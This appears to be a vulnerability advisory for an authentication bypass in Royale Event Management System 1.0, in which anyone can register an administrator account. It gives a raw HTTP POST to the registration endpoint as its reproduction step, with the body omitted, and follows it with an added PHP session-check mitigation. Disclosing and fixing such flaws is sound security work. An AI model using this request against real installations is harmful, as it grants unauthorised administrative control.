Royale Event Management System 1.0 Privilege Escalation

Royale Event Management System version 1.0 suffers from a privilege escalation vulnerability by allowing an attacker to register an account as an administrator.

MD5 | 35f13a99bc5c2140a4b831ec8158ec5d

# Exploit Title: Royale Event Management System 1.0 - Authentication Bypass
# Date: 25/03/2022
# Exploit Author: Mr Empy
# Software Link:
# Version: 1.0
# Tested on: Linux

Royale Event Management System 1.0 - Authentication Bypass

Royale Event Management System version 1.0 is affected by a vulnerability
that allows an attacker to bypass authentication. Because of the lack of
session validation, the attacker could register a user with administrative
permissions over the application and gain full access to it.

Severity Level:
7.3 (High)

Affected Product:
Royale Event Management System v1.0

Steps to Reproduce:

1. Open a request repeater (like Burp Suite) and send this request:

POST /royal_event/userregister.php HTTP/1.1
Content-Length: 164
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close


Fill in each parameter with its corresponding value and send the request.
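
Mitigation sketch for the missing session validation described above. This is an added example, not code from the application or from the advisory author. It assumes that the registration endpoint is meant to be used only by a logged-in administrator; the session keys (`user_id`, `role`, `last_seen`), the role name `admin` and the timeout value are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: guard for an admin-only registration endpoint.
// Session keys, role name and timeout are assumptions, not taken
// from the application's source.

const IDLE_TIMEOUT_SECONDS = 900;

function start_hardened_session(): void
{
    // Reject session IDs the server did not issue.
    ini_set('session.use_strict_mode', '1');
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

function is_admin_session(array $session, int $now): bool
{
    if (!isset($session['user_id'], $session['role'], $session['last_seen'])) {
        return false; // no authenticated session at all
    }
    if ($now - (int) $session['last_seen'] > IDLE_TIMEOUT_SECONDS) {
        return false; // session idle for too long
    }
    return $session['role'] === 'admin';
}

function require_admin_or_die(): void
{
    start_hardened_session();
    if (!is_admin_session($_SESSION, time())) {
        $_SESSION = [];
        session_destroy();
        http_response_code(403);
        exit('Forbidden'); // stop here so no account is created
    }
    $_SESSION['last_seen'] = time();
}

// First statement of the registration handler, before $_POST is read.
require_admin_or_die();
```

The guard has to run before any request parameter is processed, and the handler has to terminate on failure rather than only emit a redirect header.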

